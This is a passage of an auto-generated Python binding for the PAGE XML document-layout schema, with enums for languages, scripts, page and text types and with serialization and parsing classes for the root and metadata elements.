YIDDISH='Yiddish'
YORUBA='Yoruba'
ZHUANG='Zhuang'
ZULU='Zulu'
OTHER='other'
class PageTypeSimpleType(str, Enum):
FRONTCOVER='front-cover'
BACKCOVER='back-cover'
TITLE='title'
TABLEOFCONTENTS='table-of-contents'
INDEX='index'
CONTENT='content'
BLANK='blank'
OTHER='other'
class ProductionSimpleType(str, Enum):
"""Text production type"""
PRINTED='printed'
TYPEWRITTEN='typewritten'
HANDWRITTENCURSIVE='handwritten-cursive'
HANDWRITTENPRINTSCRIPT='handwritten-printscript'
MEDIEVALMANUSCRIPT='medieval-manuscript'
OTHER='other'
class ReadingDirectionSimpleType(str, Enum):
LEFTTORIGHT='left-to-right'
RIGHTTOLEFT='right-to-left'
TOPTOBOTTOM='top-to-bottom'
BOTTOMTOTOP='bottom-to-top'
class ScriptSimpleType(str, Enum):
"""iso15924 2016-07-14"""
ADLM_ADLAM='Adlm - Adlam'
AFAK_AFAKA='Afak - Afaka'
AGHB_CAUCASIAN_ALBANIAN='Aghb - Caucasian Albanian'
AHOM_AHOM_TAI_AHOM='Ahom - Ahom, Tai Ahom'
ARAB_ARABIC='Arab - Arabic'
ARAN_ARABIC_NASTALIQVARIANT='Aran - Arabic (Nastaliq variant)'
ARMI_IMPERIAL_ARAMAIC='Armi - Imperial Aramaic'
ARMN_ARMENIAN='Armn - Armenian'
AVST_AVESTAN='Avst - Avestan'
BALI_BALINESE='Bali - Balinese'
BAMU_BAMUM='Bamu - Bamum'
BASS_BASSA_VAH='Bass - Bassa Vah'
BATK_BATAK='Batk - Batak'
BENG_BENGALI='Beng - Bengali'
BHKS_BHAIKSUKI='Bhks - Bhaiksuki'
BLIS_BLISSYMBOLS='Blis - Blissymbols'
BOPO_BOPOMOFO='Bopo - Bopomofo'
BRAH_BRAHMI='Brah - Brahmi'
BRAI_BRAILLE='Brai - Braille'
BUGI_BUGINESE='Bugi - Buginese'
BUHD_BUHID='Buhd - Buhid'
CAKM_CHAKMA='Cakm - Chakma'
CANS_UNIFIED_CANADIAN_ABORIGINAL_SYLLABICS='Cans - Unified Canadian Aboriginal Syllabics'
CARI_CARIAN='Cari - Carian'
CHAM_CHAM='Cham - Cham'
CHER_CHEROKEE='Cher - Cherokee'
CIRT_CIRTH='Cirt - Cirth'
COPT_COPTIC='Copt - Coptic'
CPRT_CYPRIOT='Cprt - Cypriot'
CYRL_CYRILLIC='Cyrl - Cyrillic'
CYRS_CYRILLIC_OLD_CHURCH_SLAVONICVARIANT='Cyrs - Cyrillic (Old Church Slavonic variant)'
DEVA_DEVANAGARI_NAGARI='Deva - Devanagari (Nagari)'
DSRT_DESERET_MORMON='Dsrt - Deseret (Mormon)'
DUPL_DUPLOYANSHORTHAND_DUPLOYANSTENOGRAPHY='Dupl - Duployan shorthand, Duployan stenography'
EGYD_EGYPTIANDEMOTIC='Egyd - Egyptian demotic'
EGYH_EGYPTIANHIERATIC='Egyh - Egyptian hieratic'
EGYP_EGYPTIANHIEROGLYPHS='Egyp - Egyptian hieroglyphs'
ELBA_ELBASAN='Elba - Elbasan'
ETHI_ETHIOPIC='Ethi - Ethiopic'
GEOK_KHUTSURI_ASOMTAVRULIAND_NUSKHURI='Geok - Khutsuri (Asomtavruli and Nuskhuri)'
GEOR_GEORGIAN_MKHEDRULI='Geor - Georgian (Mkhedruli)'
GLAG_GLAGOLITIC='Glag - Glagolitic'
GOTH_GOTHIC='Goth - Gothic'
GRAN_GRANTHA='Gran - Grantha'
GREK_GREEK='Grek - Greek'
GUJR_GUJARATI='Gujr - Gujarati'
GURU_GURMUKHI='Guru - Gurmukhi'
HANB_HANWITH_BOPOMOFO='Hanb - Han with Bopomofo'
HANG_HANGUL='Hang - Hangul'
HANI_HAN_HANZI_KANJI_HANJA='Hani - Han (Hanzi, Kanji, Hanja)'
HANO_HANUNOO_HANUNÓO='Hano - Hanunoo (Hanunóo)'
HANS_HAN_SIMPLIFIEDVARIANT='Hans - Han (Simplified variant)'
HANT_HAN_TRADITIONALVARIANT='Hant - Han (Traditional variant)'
HATR_HATRAN='Hatr - Hatran'
HEBR_HEBREW='Hebr - Hebrew'
HIRA_HIRAGANA='Hira - Hiragana'
HLUW_ANATOLIAN_HIEROGLYPHS='Hluw - Anatolian Hieroglyphs'
HMNG_PAHAWH_HMONG='Hmng - Pahawh Hmong'
HRKT_JAPANESESYLLABARIES='Hrkt - Japanese syllabaries'
HUNG_OLD_HUNGARIAN_HUNGARIAN_RUNIC='Hung - Old Hungarian (Hungarian Runic)'
INDS_INDUS_HARAPPAN='Inds - Indus (Harappan)'
ITAL_OLD_ITALIC_ETRUSCAN_OSCANETC='Ital - Old Italic (Etruscan, Oscan etc.)'
JAMO_JAMO='Jamo - Jamo'
JAVA_JAVANESE='Java - Javanese'
JPAN_JAPANESE='Jpan - Japanese'
JURC_JURCHEN='Jurc - Jurchen'
KALI_KAYAH_LI='Kali - Kayah Li'
KANA_KATAKANA='Kana - Katakana'
KHAR_KHAROSHTHI='Khar - Kharoshthi'
KHMR_KHMER='Khmr - Khmer'
KHOJ_KHOJKI='Khoj - Khojki'
KITL_KHITANLARGESCRIPT='Kitl - Khitan large script'
KITS_KHITANSMALLSCRIPT='Kits - Khitan small script'
KNDA_KANNADA='Knda - Kannada'
KORE_KOREANALIASFOR_HANGUL_HAN='Kore - Korean (alias for Hangul + Han)'
KPEL_KPELLE='Kpel - Kpelle'
KTHI_KAITHI='Kthi - Kaithi'
LANA_TAI_THAM_LANNA='Lana - Tai Tham (Lanna)'
LAOO_LAO='Laoo - Lao'
LATF_LATIN_FRAKTURVARIANT='Latf - Latin (Fraktur variant)'
LATG_LATIN_GAELICVARIANT='Latg - Latin (Gaelic variant)'
LATN_LATIN='Latn - Latin'
LEKE_LEKE='Leke - Leke'
LEPC_LEPCHARÓNG='Lepc - Lepcha (Róng)'
LIMB_LIMBU='Limb - Limbu'
LINA_LINEARA='Lina - Linear A'
LINB_LINEARB='Linb - Linear B'
LISU_LISU_FRASER='Lisu - Lisu (Fraser)'
LOMA_LOMA='Loma - Loma'
LYCI_LYCIAN='Lyci - Lycian'
LYDI_LYDIAN='Lydi - Lydian'
MAHJ_MAHAJANI='Mahj - Mahajani'
MAND_MANDAIC_MANDAEAN='Mand - Mandaic, Mandaean'
MANI_MANICHAEAN='Mani - Manichaean'
MARC_MARCHEN='Marc - Marchen'
MAYA_MAYANHIEROGLYPHS='Maya - Mayan hieroglyphs'
MEND_MENDE_KIKAKUI='Mend - Mende Kikakui'
MERC_MEROITIC_CURSIVE='Merc - Meroitic Cursive'
MERO_MEROITIC_HIEROGLYPHS='Mero - Meroitic Hieroglyphs'
MLYM_MALAYALAM='Mlym - Malayalam'
MODI_MODI_MOḌĪ='Modi - Modi, Moḍī'
MONG_MONGOLIAN='Mong - Mongolian'
MOON_MOON_MOONCODE_MOONSCRIPT_MOONTYPE='Moon - Moon (Moon code, Moon script, Moon type)'
MROO_MRO_MRU='Mroo - Mro, Mru'
MTEI_MEITEI_MAYEK_MEITHEI_MEETEI='Mtei - Meitei Mayek (Meithei, Meetei)'
MULT_MULTANI='Mult - Multani'
MYMR_MYANMAR_BURMESE='Mymr - Myanmar (Burmese)'
NARB_OLD_NORTH_ARABIAN_ANCIENT_NORTH_ARABIAN='Narb - Old North Arabian (Ancient North Arabian)'
NBAT_NABATAEAN='Nbat - Nabataean'
NEWA_NEWA_NEWAR_NEWARI='Newa - Newa, Newar, Newari'
NKGB_NAKHI_GEBA='Nkgb - Nakhi Geba'
NKOON_KO='Nkoo - N’Ko'
NSHUNÜSHU='Nshu - Nüshu'
OGAM_OGHAM='Ogam - Ogham'
OLCK_OL_CHIKI_OL_CEMET_OL_SANTALI='Olck - Ol Chiki (Ol Cemet’, Ol, Santali)'
ORKH_OLD_TURKIC_ORKHON_RUNIC='Orkh - Old Turkic, Orkhon Runic'
ORYA_ORIYA='Orya - Oriya'
OSGE_OSAGE='Osge - Osage'
OSMA_OSMANYA='Osma - Osmanya'
PALM_PALMYRENE='Palm - Palmyrene'
PAUC_PAU_CIN_HAU='Pauc - Pau Cin Hau'
PERM_OLD_PERMIC='Perm - Old Permic'
PHAG_PHAGSPA='Phag - Phags-pa'
PHLI_INSCRIPTIONAL_PAHLAVI='Phli - Inscriptional Pahlavi'
PHLP_PSALTER_PAHLAVI='Phlp - Psalter Pahlavi'
PHLV_BOOK_PAHLAVI='Phlv - Book Pahlavi'
PHNX_PHOENICIAN='Phnx - Phoenician'
PIQD_KLINGONKLIP_IQA_D='Piqd - Klingon (KLI pIqaD)'
PLRD_MIAO_POLLARD='Plrd - Miao (Pollard)'
PRTI_INSCRIPTIONAL_PARTHIAN='Prti - Inscriptional Parthian'
RJNG_REJANG_REDJANG_KAGANGA='Rjng - Rejang (Redjang, Kaganga)'
RORO_RONGORONGO='Roro - Rongorongo'
RUNR_RUNIC='Runr - Runic'
SAMR_SAMARITAN='Samr - Samaritan'
SARA_SARATI='Sara - Sarati'
SARB_OLD_SOUTH_ARABIAN='Sarb - Old South Arabian'
SAUR_SAURASHTRA='Saur - Saurashtra'
SGNW_SIGN_WRITING='Sgnw - SignWriting'
SHAW_SHAVIAN_SHAW='Shaw - Shavian (Shaw)'
SHRD_SHARADAŚĀRADĀ='Shrd - Sharada, Śāradā'
SIDD_SIDDHAM='Sidd - Siddham'
SIND_KHUDAWADI_SINDHI='Sind - Khudawadi, Sindhi'
SINH_SINHALA='Sinh - Sinhala'
SORA_SORA_SOMPENG='Sora - Sora Sompeng'
SUND_SUNDANESE='Sund - Sundanese'
SYLO_SYLOTI_NAGRI='Sylo - Syloti Nagri'
SYRC_SYRIAC='Syrc - Syriac'
SYRE_SYRIAC_ESTRANGELOVARIANT='Syre - Syriac (Estrangelo variant)'
SYRJ_SYRIAC_WESTERNVARIANT='Syrj - Syriac (Western variant)'
SYRN_SYRIAC_EASTERNVARIANT='Syrn - Syriac (Eastern variant)'
TAGB_TAGBANWA='Tagb - Tagbanwa'
TAKR_TAKRI='Takr - Takri'
TALE_TAI_LE='Tale - Tai Le'
TALU_NEW_TAI_LUE='Talu - New Tai Lue'
TAML_TAMIL='Taml - Tamil'
TANG_TANGUT='Tang - Tangut'
TAVT_TAI_VIET='Tavt - Tai Viet'
TELU_TELUGU='Telu - Telugu'
TENG_TENGWAR='Teng - Tengwar'
TFNG_TIFINAGH_BERBER='Tfng - Tifinagh (Berber)'
TGLG_TAGALOG_BAYBAYIN_ALIBATA='Tglg - Tagalog (Baybayin, Alibata)'
THAA_THAANA='Thaa - Thaana'
THAI_THAI='Thai - Thai'
TIBT_TIBETAN='Tibt - Tibetan'
TIRH_TIRHUTA='Tirh - Tirhuta'
UGAR_UGARITIC='Ugar - Ugaritic'
VAII_VAI='Vaii - Vai'
VISP_VISIBLE_SPEECH='Visp - Visible Speech'
WARA_WARANG_CITI_VARANG_KSHITI='Wara - Warang Citi (Varang Kshiti)'
WOLE_WOLEAI='Wole - Woleai'
XPEO_OLD_PERSIAN='Xpeo - Old Persian'
XSUX_CUNEIFORM_SUMERO_AKKADIAN='Xsux - Cuneiform, Sumero-Akkadian'
YIII_YI='Yiii - Yi'
ZINH_CODEFORINHERITEDSCRIPT='Zinh - Code for inherited script'
ZMTH_MATHEMATICALNOTATION='Zmth - Mathematical notation'
ZSYE_SYMBOLS_EMOJIVARIANT='Zsye - Symbols (Emoji variant)'
ZSYM_SYMBOLS='Zsym - Symbols'
ZXXX_CODEFORUNWRITTENDOCUMENTS='Zxxx - Code for unwritten documents'
ZYYY_CODEFORUNDETERMINEDSCRIPT='Zyyy - Code for undetermined script'
ZZZZ_CODEFORUNCODEDSCRIPT='Zzzz - Code for uncoded script'
OTHER='other'
class TextDataTypeSimpleType(str, Enum):
XSDDECIMAL='xsd:decimal' # Examples: "123.456", "+1234.456", "-1234.456", "-.456", "-456"
XSDFLOAT='xsd:float' # Examples: "123.456", "+1234.456", "-1.2344e56", "-.45E-6", "INF", "-INF", "NaN"
XSDINTEGER='xsd:integer' # Examples: "123456", "+00000012", "-1", "-456"
XSDBOOLEAN='xsd:boolean' # Examples: "true", "false", "1", "0"
XSDDATE='xsd:date' # Examples: "2001-10-26", "2001-10-26+02:00", "2001-10-26Z", "2001-10-26+00:00", "-2001-10-26", "-20000-04-01"
XSDTIME='xsd:time' # Examples: "21:32:52", "21:32:52+02:00", "19:32:52Z", "19:32:52+00:00", "21:32:52.12679"
XSDDATE_TIME='xsd:dateTime' # Examples: "2001-10-26T21:32:52", "2001-10-26T21:32:52+02:00", "2001-10-26T19:32:52Z", "2001-10-26T19:32:52+00:00", "-2001-10-26T21:32:52", "2001-10-26T21:32:52.12679"
XSDSTRING='xsd:string' # Generic text string
OTHER='other' # An XSD type that is not listed or a custom type (use dataTypeDetails attribute).
class TextLineOrderSimpleType(str, Enum):
TOPTOBOTTOM='top-to-bottom'
BOTTOMTOTOP='bottom-to-top'
LEFTTORIGHT='left-to-right'
RIGHTTOLEFT='right-to-left'
class TextTypeSimpleType(str, Enum):
PARAGRAPH='paragraph'
HEADING='heading'
CAPTION='caption'
HEADER='header'
FOOTER='footer'
PAGENUMBER='page-number'
DROPCAPITAL='drop-capital'
CREDIT='credit'
FLOATING='floating'
SIGNATUREMARK='signature-mark'
CATCHWORD='catch-word'
MARGINALIA='marginalia'
FOOTNOTE='footnote'
FOOTNOTECONTINUED='footnote-continued'
ENDNOTE='endnote'
TOCENTRY='TOC-entry'
LISTLABEL='list-label'
OTHER='other'
class UnderlineStyleSimpleType(str, Enum):
SINGLE_LINE='singleLine'
DOUBLE_LINE='doubleLine'
OTHER='other'
class charTypeType(str, Enum):
"""Type of character represented by the
grapheme, group, or non-printing character element."""
BASE='base'
COMBINING='combining'
class imageResolutionUnitType(str, Enum):
"""Specifies the unit of the resolution information
referring to a standardised unit of measurement
(pixels per inch, pixels per centimeter or other)."""
PPI='PPI'
PPCM='PPCM'
OTHER='other'
class typeType(str, Enum):
"""Type of metadata (e.g. author)"""
AUTHOR='author'
IMAGE_PROPERTIES='imageProperties'
PROCESSING_STEP='processingStep'
OTHER='other'
class typeType1(str, Enum):
LINK='link'
JOIN='join'
class typeType3(str, Enum):
XSDSTRING='xsd:string'
XSDINTEGER='xsd:integer'
XSDBOOLEAN='xsd:boolean'
XSDFLOAT='xsd:float'
class PcGtsType(GeneratedsSuper):
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('pcGtsId', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('Metadata', 'MetadataType', 0, 0, {'name': 'Metadata', 'type': 'MetadataType'}, None),
MemberSpec_('Page', 'PageType', 0, 0, {'name': 'Page', 'type': 'PageType'}, None),
]
subclass = None
superclass = None
def __init__(self, pcGtsId=None, Metadata=None, Page=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.pcGtsId = _cast(None, pcGtsId)
self.pcGtsId_nsprefix_ = None
self.Metadata = Metadata
self.Metadata_nsprefix_ = "pc"
self.Page = Page
self.Page_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, PcGtsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if PcGtsType.subclass:
return PcGtsType.subclass(*args_, **kwargs_)
else:
return PcGtsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Metadata(self):
return self.Metadata
def set_Metadata(self, Metadata):
self.Metadata = Metadata
def get_Page(self):
return self.Page
def set_Page(self, Page):
self.Page = Page
def get_pcGtsId(self):
return self.pcGtsId
def set_pcGtsId(self, pcGtsId):
self.pcGtsId = pcGtsId
def hasContent_(self):
if (
self.Metadata is not None or
self.Page is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='PcGtsType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('PcGtsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'PcGtsType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='PcGtsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='PcGtsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='PcGtsType'):
if self.pcGtsId is not None and 'pcGtsId' not in already_processed:
already_processed.add('pcGtsId')
outfile.write(' pcGtsId=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.pcGtsId), input_name='pcGtsId')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='PcGtsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Metadata is not None:
namespaceprefix_ = self.Metadata_nsprefix_ + ':' if (UseCapturedNS_ and self.Metadata_nsprefix_) else ''
self.Metadata.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Metadata', pretty_print=pretty_print)
if self.Page is not None:
namespaceprefix_ = self.Page_nsprefix_ + ':' if (UseCapturedNS_ and self.Page_nsprefix_) else ''
self.Page.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Page', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('pcGtsId', node)
if value is not None and 'pcGtsId' not in already_processed:
already_processed.add('pcGtsId')
self.pcGtsId = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Metadata':
obj_ = MetadataType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Metadata = obj_
obj_.original_tagname_ = 'Metadata'
elif nodeName_ == 'Page':
obj_ = PageType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Page = obj_
obj_.original_tagname_ = 'Page'
def get_imageFilename(self):
'''
Get image filename from root
'''
return self.Page.imageFilename
# end class PcGtsType
class MetadataType(GeneratedsSuper):
"""External reference of any kind"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('externalRef', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('Creator', 'string', 0, 0, {'name': 'Creator', 'type': 'string'}, None),
MemberSpec_('Created', 'dateTime', 0, 0, {'name': 'Created', 'type': 'dateTime'}, None),
MemberSpec_('LastChange', 'dateTime', 0, 0, {'name': 'LastChange', 'type': 'dateTime'}, None),
MemberSpec_('Comments', 'string', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'Comments', 'type': 'string'}, None),
MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
MemberSpec_('MetadataItem', 'MetadataItemType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'MetadataItem', 'type': 'MetadataItemType'}, None),
]
subclass = None
superclass = None
def __init__(self, externalRef=None, Creator=None, Created=None, LastChange=None, Comments=None, UserDefined=None, MetadataItem=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.externalRef = _cast(None, externalRef)
self.externalRef_nsprefix_ = None
self.Creator = Creator
self.Creator_nsprefix_ = None
if isinstance(Created, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(Created, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = Created
self.Created = initvalue_
self.Created_nsprefix_ = None
if isinstance(LastChange, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(LastChange, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = LastChange
self.LastChange = initvalue_
self.LastChange_nsprefix_ = None
self.Comments = Comments
self.Comments_nsprefix_ = None
self.UserDefined = UserDefined
self.UserDefined_nsprefix_ = "pc"
if MetadataItem is None:
self.MetadataItem = []
else:
self.MetadataItem = MetadataItem
self.MetadataItem_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, MetadataType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if MetadataType.subclass:
return MetadataType.subclass(*args_, **kwargs_)
else:
return MetadataType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Creator(self):
return self.Creator
def set_Creator(self, Creator):
self.Creator = Creator
def get_Created(self):
return self.Created
def set_Created(self, Created):
self.Created = Created
def get_LastChange(self):
return self.LastChange
def set_LastChange(self, LastChange):
self.LastChange = LastChange
def get_Comments(self):
return self.Comments
def set_Comments(self, Comments):
self.Comments = Comments
def get_UserDefined(self):
return self.UserDefined
def set_UserDefined(self, UserDefined):
self.UserDefined = UserDefined
def get_MetadataItem(self):
return self.MetadataItem
def set_MetadataItem(self, MetadataItem):
self.MetadataItem = MetadataItem
def add_MetadataItem(self, value):
self.MetadataItem.append(value)
def insert_MetadataItem_at(self, index, value):
self.MetadataItem.insert(index, value)
def replace_MetadataItem_at(self, index, value):
self.MetadataItem[index] = value
def get_externalRef(self):
return self.externalRef
def set_externalRef(self, externalRef):
self.externalRef = externalRef
def hasContent_(self):
if (
self.Creator is not None or
self.Created is not None or
self.LastChange is not None or
self.Comments is not None or
self.UserDefined is not None or
self.MetadataItem
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15" xmlns:None="http://www.w3.org/2001/XMLSchema" ', name_='MetadataType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('MetadataType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'MetadataType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MetadataType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='MetadataType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='MetadataType'):
if self.externalRef is not None and 'externalRef' not in already_processed:
already_processed.add('externalRef')
outfile.write(' externalRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.externalRef), input_name='externalRef')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15" xmlns:None="http://www.w3.org/2001/XMLSchema" ', name_='MetadataType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Creator is not None:
namespaceprefix_ = self.Creator_nsprefix_ + ':' if (UseCapturedNS_ and self.Creator_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sCreator>%s</%sCreator>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.Creator), input_name='Creator')), namespaceprefix_ , eol_))
if self.Created is not None:
namespaceprefix_ = self.Created_nsprefix_ + ':' if (UseCapturedNS_ and self.Created_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sCreated>%s</%sCreated>%s' % (namespaceprefix_ , self.gds_format_datetime(self.Created, input_name='Created'), namespaceprefix_ , eol_))
if self.LastChange is not None:
namespaceprefix_ = self.LastChange_nsprefix_ + ':' if (UseCapturedNS_ and self.LastChange_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sLastChange>%s</%sLastChange>%s' % (namespaceprefix_ , self.gds_format_datetime(self.LastChange, input_name='LastChange'), namespaceprefix_ , eol_))
if self.Comments is not None:
namespaceprefix_ = self.Comments_nsprefix_ + ':' if (UseCapturedNS_ and self.Comments_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sComments>%s</%sComments>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.Comments), input_name='Comments')), namespaceprefix_ , eol_))
if self.UserDefined is not None:
namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
for MetadataItem_ in self.MetadataItem:
namespaceprefix_ = self.MetadataItem_nsprefix_ + ':' if (UseCapturedNS_ and self.MetadataItem_nsprefix_) else ''
MetadataItem_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='MetadataItem', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('externalRef', node)
if value is not None and 'externalRef' not in already_processed:
already_processed.add('externalRef')
self.externalRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Creator':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'Creator')
value_ = self.gds_validate_string(value_, node, 'Creator')
self.Creator = value_
self.Creator_nsprefix_ = child_.prefix
elif nodeName_ == 'Created':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.Created = dval_
self.Created_nsprefix_ = child_.prefix
elif nodeName_ == 'LastChange':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.LastChange = dval_
self.LastChange_nsprefix_ = child_.prefix
elif nodeName_ == 'Comments':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'Comments')
value_ = self.gds_validate_string(value_, node, 'Comments')
self.Comments = value_
self.Comments_nsprefix_ = child_.prefix
elif nodeName_ == 'UserDefined':
obj_ = UserDefinedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UserDefined = obj_
obj_.original_tagname_ = 'UserDefined'
elif nodeName_ == 'MetadataItem':
obj_ = MetadataItemType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.MetadataItem.append(obj_)
obj_.original_tagname_ = 'MetadataItem'
# end class MetadataType
class MetadataItemType(GeneratedsSuper):
"""Type of metadata (e.g. author)
E.g. imagePhotometricInterpretation
E.g. RGB"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('type_', 'typeType', 0, 1, {'use': 'optional'}),
MemberSpec_('name', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('value', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('date', 'dateTime', 0, 1, {'use': 'optional'}),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
]
subclass = None
superclass = None
def __init__(self, type_=None, name=None, value=None, date=None, Labels=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
self.name = _cast(None, name)
self.name_nsprefix_ = None
self.value = _cast(None, value)
self.value_nsprefix_ = None
if isinstance(date, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = date
self.date = initvalue_
if Labels is None:
self.Labels = []
else:
self.Labels = Labels
self.Labels_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, MetadataItemType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if MetadataItemType.subclass:
